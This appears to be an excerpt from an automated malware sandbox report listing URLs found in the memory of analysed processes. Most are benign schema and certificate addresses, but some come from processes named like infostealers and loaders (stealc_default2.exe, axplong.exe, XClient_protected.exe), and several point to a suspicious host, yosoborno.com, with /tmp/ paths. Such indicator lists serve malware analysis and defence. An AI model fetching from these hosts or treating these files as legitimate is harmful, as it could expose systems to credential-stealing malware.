Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, XClient_protected.exe, 00000026.00000002.2519726609.00000000035F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, runtime.exe.17.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: runtime.exe, 00000023.00000002.2070175435.0000000000434000.00000004.00000001.01000000.00000018.sdmp, runtime.exe, 00000023.00000002.2070175435.0000000000420000.00000004.00000001.01000000.00000018.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, runtime.exe.17.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: runtime.exe, 00000023.00000002.2070175435.0000000000434000.00000004.00000001.01000000.00000018.sdmp, runtime.exe, 00000023.00000002.2070175435.0000000000420000.00000004.00000001.01000000.00000018.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, runtime.exe.17.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, runtime.exe.17.dr	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2071814033.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2071814033.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2071814033.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2071814033.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: explorer.exe, 00000020.00000000.2015237887.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2271337810.000000000C44D000.00000004.00000001.00020000.00000000.sdmp, runtime.exe, 00000023.00000002.2070175435.0000000000420000.00000004.00000001.01000000.00000018.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.31.dr, crypteda.exe.17.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, GOLD[1].exe.17.dr, mozglue.dll.31.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, crypteda.exe.17.dr, GOLD[1].exe.17.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: explorer.exe, 00000020.00000000.1998005775.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: stealc_default2.exe, 0000001F.00000002.2196839633.0000000069AED000.00000002.00000001.01000000.0000001B.sdmp, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: BitcoinCore[1].exe.17.dr	String found in binary or memory: http://www.mozilla.org/editor/midasdemo/securityprefs.html
Source: stealc_default2.exe, 0000001F.00000002.2196511355.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000002.2174996744.000000001B526000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: explorer.exe, 00000020.00000003.2271419290.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2271419290.000000000C1E9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://yosoborno.com/
Source: explorer.exe, 00000020.00000003.2271419290.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://yosoborno.com/bH
Source: explorer.exe, 00000020.00000003.2271419290.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://yosoborno.com/mp/6HP
Source: explorer.exe, 00000020.00000003.2271419290.000000000C12D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2549047522.000000000C42E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2549047522.000000000C12D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://yosoborno.com/tmp/
Source: explorer.exe, 00000020.00000003.2271419290.000000000C12D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2549047522.000000000C12D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://yosoborno.com/tmp/.d2
Source: explorer.exe, 00000020.00000002.2549047522.000000000C12D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://yosoborno.com/tmp/ds
